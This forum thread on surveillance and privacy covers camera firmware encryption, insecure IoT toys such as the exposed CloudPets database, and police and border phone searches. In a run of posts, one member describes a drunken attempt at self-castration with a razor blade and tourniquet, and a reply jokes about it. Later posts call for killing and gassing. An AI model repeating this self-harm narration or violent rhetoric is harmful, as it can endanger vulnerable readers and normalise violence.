hokay who put all this sticky stuff on my lighter wont flick a bic.

I'm finished but for one more kosher hang I cut late and hanging for a day or so.

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 8:03 pm
by MadMoonMan
I kept all my reciepts lets accumulate some costs versus a little mason jar.

How much did this cost me per small mason jar. i.e.. 1 ounce.

I need to get one more light bill.

the small TIN-FOIL-HAT thread

Posted: Thu Dec 15, 2016 3:08 pm
by deran
bentech wrote:Yet even as tech companies like WhatsApp and Apple have implemented default encryption in their products strong enough to flummox US law enforcement, standalone camera manufacturers haven’t—perhaps due to the technical challenge, the financial burden, or a combination of both. Third-party software makers, like Canon-focused Magic Lantern, have experimented with adding aftermarket encryption features to cameras, but the code remains relatively untested and requires a complex process of altering the camera’s firmware that goes beyond the average user’s comfort zone. ... d-cameras/" onclick=";return false;

me love me ML hack ;)

yes, you can screw up your cam, and i mean totally .. making it dead to the bone ...

but on the other hand, i had already cdhk on my first cam (canon developers hacking kit) and followed within their forums how they code ...
and just bc maybe im so sentimental and did my assembler thingy back in the 80s ... i said to myself, wtf .. if something breaks im gonna code it myself ... didnt happen .. ML is doin its magic as always, alone this piece of code is more worth than the most expansive dslr money can buy imho

dont do it, if you dont know what you are doing ... :toker1:

the small TIN-FOIL-HAT thread

Posted: Thu Dec 15, 2016 7:33 pm
by Jesús Malverde
Reading the forum posts you linked to it looks buggy, unreliable, extremely difficult and cumbersome to use, and even if you jump through all the hoops correctly, in the end crackable by crypto adepts. Cool to play around with though if you got an old beater Canon DSLR laying around you can afford to brick.

the small TIN-FOIL-HAT thread

Posted: Sun Dec 18, 2016 12:55 pm
by deran
Jesús Malverde wrote:Reading the forum posts you linked to it looks buggy,
Jesús Malverde wrote:unreliable,
Jesús Malverde wrote:extremely difficult
Jesús Malverde wrote:and cumbersome to use,
Jesús Malverde wrote: and even if you jump through all the hoops correctly, in the end crackable by crypto adepts.
POC works, contrary hasnt been demonstrated yet;
its a question of the bigger picture, everything can be cracked today with enough resources: i wouldnt be surprised that a quantum computing extesion is hooked upfront prism lol
but, how big are the chances that a 3rd world country police station is gonna crack encryption or is sending this to somebody else to do it, its a utility for first encounters, its not the answer to all questions, and should be treated as such
Jesús Malverde wrote:Cool to play around with though if you got an old beater Canon DSLR laying around you can afford to brick.
i would have done it too, without a backup cam, which i actually did, first time initally when i hadnt the "younger" full frame ;)


the small TIN-FOIL-HAT thread

Posted: Sun Dec 18, 2016 6:47 pm
by MadMoonMan
I was a codebreaker in army and any code is breakable. Thats the reason APPle? put the tap 3 times on the celing and you scamble me. On.

the small TIN-FOIL-HAT thread

Posted: Sun Dec 18, 2016 6:50 pm
by MadMoonMan
If you have a mass of information.

All you need is a way to manipulate and analyze.

the small TIN-FOIL-HAT thread

Posted: Sun Dec 18, 2016 6:51 pm
by MadMoonMan
And in our day and age you have no way out short of

Disconnecting from society Completely

the small TIN-FOIL-HAT thread

Posted: Sun Dec 18, 2016 6:58 pm
by MadMoonMan
Therefore I'm considering cuttin my penis off tonight and changing my name to

Sebrina Appletree.

I'm drinking 2 bottles of vodka now and

soaking a one sided razor blade in alcohol

I had constricted things with a rubber band but it broke and now I'm looking for anything elastic I can substitute for strictureing emergency blood flow.

the small TIN-FOIL-HAT thread

Posted: Sun Dec 18, 2016 7:02 pm
by MadMoonMan
My red cross training is kinda outdated lol so My terminology and spelling for this kind of medical procedure or precedure? may be let aside as I focuas the important parts of my brain on slicing off my penis? I can't worry about how to spell Capitol or Capital right now? KNow what AH MEEN.. grits teet.. 'm I'm in the middle of circumcising off my penis.

Allow me to please focus so its done right.

Ok No more distractions.

Ok ready deep breath one 1 2 two ..


I need another drink or 2 I waited to long

the small TIN-FOIL-HAT thread

Posted: Tue Dec 20, 2016 6:03 pm
by Intrinsic
Don't bother, i found they just grow back, bigger, thicker and hairier then before. <puff puff>

the small TIN-FOIL-HAT thread

Posted: Tue Dec 20, 2016 11:36 pm
by Jesús Malverde

the small TIN-FOIL-HAT thread

Posted: Fri Feb 24, 2017 3:31 pm
by bentech
good to see mitnick still around!

Famed Hacker Kevin Mitnick Shows You How to Go Invisible Online ... le-online/" onclick=";return false;

the small TIN-FOIL-HAT thread

Posted: Sun Feb 26, 2017 1:45 pm
by bentech
"Last year in the U.S. market alone Chevrolet collected 4,220 terabytes of data from customer's cars... Retailers, advertisers, marketers, product planners, financial analysts, government agencies, and so many others will eagerly pay to get access to that information."

Did Silicon Valley Lose The Race To Build Self-Driving Cars? ... iving-cars" onclick=";return false;

the small TIN-FOIL-HAT thread

Posted: Mon Feb 27, 2017 3:41 am
by deran
Stories of hacked devices like headphones and pacemakers are unsettling, but the idea of compromised children's toys is extra creepy. Since the dolls use an unprotected wireless Bluetooth connection, anyone in the vicinity could potentially listen in to the conversation. A company could also use the toys to advertise directly to children, or it could sell the information it gathers to police and intelligence agencies. ... ayla-doll/" onclick=";return false;

what a bunch of mofos, theyve crossed a line with this "toy" ... spying on your kids, and anybody who can openly connect to the unencrypted bluetooth/wifi interface ... i was really shocked when i heard about it

the small TIN-FOIL-HAT thread

Posted: Tue Feb 28, 2017 1:55 pm
by bentech
On the fifth birthday of the original Raspberry Pi, the foundation has announced the Raspberry Pi Zero W, a slightly more capable variant of the miniature computer. From a report on BetaNews:
It's essentially a Pi Zero with the addition of the two features many people have been requesting -- wireless LAN and Bluetooth. Priced at $10, the Pi Zero W uses the same Cypress CYW43438 wireless chip as Raspberry Pi 3 Model B to deliver 802.11n wireless LAN and Bluetooth 4.0 connectivity. The full list of features is as follows: 1GHz, single-core CPU, 512MB RAM, mini-HDMI port, micro-USB On-The-Go port, micro-USB power, HAT-compatible 40-pin header, composite video and reset headers, CSI camera connector, 11n wireless LAN, and Bluetooth 4.0. ... -bluetooth" onclick=";return false;

the small TIN-FOIL-HAT thread

Posted: Tue Feb 28, 2017 5:44 pm
by Intrinsic
Speaking of insidious toys ... ... base_leak/" onclick=";return false;
Two million voice recordings of kids and their families were exposed online and repeatedly held to ransom – because an IoT stuffed-toy maker used an insecure MongoDB installation.

Essentially, the $40 cuddly CloudPets feature builtin microphones and speakers, and connect to the internet via an iOS or Android app on a nearby smartphone or tablet. Families can use the fake animals to exchange voice messages between their children, friends, and relatives.

For example, a parent away on a work trip can open the CloudPets app on their smartphone, record an audio message, and beam it to their kid's toy via a tablet within Bluetooth range of the gizmo at home; the recording plays when the tyke press a button on the animal's paw.

Similarly, the youngsters can record messages using the stuffed creature, and send the audio over to their mom, dad, grandparent, and so on, via the internet-connected app.

Cute ... How CloudPets passes messages from app to toy

These voice clips, along with records of 820,000 accounts associated with the each of the toys, have been left wide open on the internet, with no password protection – allowing gigabytes of sensitive material to potentially fall into the hands of criminals. And it's all due to a poorly secured NoSQL database holding 10GB of internal information.

CloudPets' internet-facing MongoDB installation, on port 2701 at, required no authentication to access, and was repeatedly extorted by miscreants, evidence shows. The database contains links to .WAV files of voice messages hosted in the Amazon cloud, again accessible with no authentication, potentially allowing the mass slurping of more than two million highly personal conversations between families and their little ones.

It appears crooks found the database, presumably by scanning the public 'net for insecure MongoDB installations, took a copy of all the data, deleted that data on the server, and left a note demanding payment for the safe return of a copy of the database. This happened three times, we're told.

Of course, anyone else wandering by the database could have swiped the records for themselves and kept quiet, so the information potentially could be in the hands of just about any miscreant.

Computer security breach expert Troy Hunt, who maintains the HaveIBeenPwned website, was tipped off about the insecurity of CloudPets, a brand of Spiral Toys, and went public today with details of the cockup.

“This is kids' voices recorded on teddy bears,” Hunt told The Register after spending a week investigating the security blunder. “I can picture my four-year-old girl, sitting in her room – it's hard to picture a more innocent scenario – and all these actors have access to what she says to her teddy bear.”

the small TIN-FOIL-HAT thread

Posted: Tue Feb 28, 2017 5:58 pm
by Intrinsic
Wow, Now the cops now want to collect fingerprints carte blanche on anybody and everybody for Smart Phone access , crime or not. ... are_found/" onclick=";return false;

"An Illinois judge has rejected a warrant sought by the US government to force everyone in a given location to apply his or her fingerprints to any Apple electronic device investigators happen to find there, a ruling contrary to a similar warrant request granted last year by a judge in California.

Under current law, the government already has the right, given sufficient evidence, to compel a specific individual to unlock an electronic device protected by a fingerprint reader like Apple's Touch ID sensor.

In 2014, a judge on Virginia’s Second Judicial Circuit ruled that a defendant could be forced to provide a fingerprint but not a passcode, the distinction being that a fingerprint is not testimonial whereas a passcode is.

Defendants thus cannot use the Fifth Amendment's protection to refuse to provide a fingerprint on the grounds that the fingerprint itself qualifies as self-incriminating testimony.

But the government's right to compel action diminishes when it lacks sufficient cause to make such demands of people, at least in Illinois.

Essentially, prosecutors want to go into a vaguely described location – perhaps a home or an office – and make every inside, regardless of who they are, provide their fingerprints to unlock their Apple handhelds so investigators can rifle through the devices for evidence. The warrant doesn't say where this raid will take place nor exactly who is targeted.

the small TIN-FOIL-HAT thread

Posted: Wed Mar 01, 2017 6:29 pm
by Butters
FUCK THE COPS :fubird:

the small TIN-FOIL-HAT thread

Posted: Wed Mar 01, 2017 6:52 pm
by bentech
the retina scanners will be everywhere before you know it...

the small TIN-FOIL-HAT thread

Posted: Thu Mar 16, 2017 5:08 pm
by Intrinsic
Canada's privacy watchdog probes US border phone seizures
Lines being drawn after Trump executive order prompts heavy-handed customs response

16 Mar 2017 at 18:43, Kieren McCarthy

The Canadian privacy commissioner has opened an investigation into the Canadian border police and a recent uptick in phone seizures.

The commissioner has received a number of complaints from Canadian citizens about their phones being taken from them at the US border and wants to know exactly what the border police are doing with those phones.

The investigation follows a request last week by the commissioner to the Canadian government to press the US government to add Canada to a list of countries that are exempted from US president Donald Trump's executive order on "enhancing public safety" – an order that strips privacy rights from all non-US citizens.

It also comes following a slew of recent reports of customs officers in both the United States and Canada taking people's phones and requiring people to unlock them if they wish to cross the border. The phones are then taken away and the owners are not informed why they were singled out or what the customs officers did with their phones.
What are they up to?

The concern is that the border police are using a legal grey area in which they are given extraordinary powers to go beyond what is necessary, such as cloning phones and keeping copies.

Almost nothing is known about what the border police do with private data taken from electronic devices: how much data they take; where they store it; how long they store it; who they share it with; is there anything secretly installed on the phone; and so on.

In theory however, this personal and sensitive information is only supposed to be collected and used for the assessing someone's access to the country and any sharing of data can only happen legally if there is a criminal case, a concern over illegal immigration or national security issues. How the Canada Border Services Agency (CBSA) chooses to define those exceptions is likely to be a key part of the investigation.

A spokeswoman for the privacy commissioner confirmed to the National Post that data retention was likely to play a part.

Currently, we are not aware of a similar investigation being held in the United States despite an alarming number of individuals being held and ordered to hand over and unlock their phones in recent weeks. But it may only be a matter of time, with lawyers currently tied up challenging Trump's travel ban.

the small TIN-FOIL-HAT thread

Posted: Fri Mar 17, 2017 9:49 pm
by MadMoonMan
You are not able to hide anything. Go off grid. Cash only in Alaskan mountains. I wish I was young enough to do that. :)

Bible says "Make friends with mammon." Which means.

Gird up your loins and live with it. or in modern verbiage.. "Put your big boy pants on."

Realize "the world of greed and evil and power and control and theft and crazy insane people and to no end on individualism."

The number of different people able to occupy this world.. is

finite considering mans current state of ..... A MAD MAN WITH NUCLEAR BOMBS IS TORTURING A POPULACE IN NORTH KOREA.

the small TIN-FOIL-HAT thread

Posted: Fri Mar 17, 2017 9:52 pm
by MadMoonMan
lets just sit around as he gets more and more powerful and accurate weapons.

Old Jewish poverb. A man says he is coming to kill you at dawn. You get up before dawn and you kill him first.

the small TIN-FOIL-HAT thread

Posted: Sun Mar 19, 2017 5:52 pm
by MadMoonMan
Government doesn't care for you

Bring out the chlorine gas

Bulldozers forward!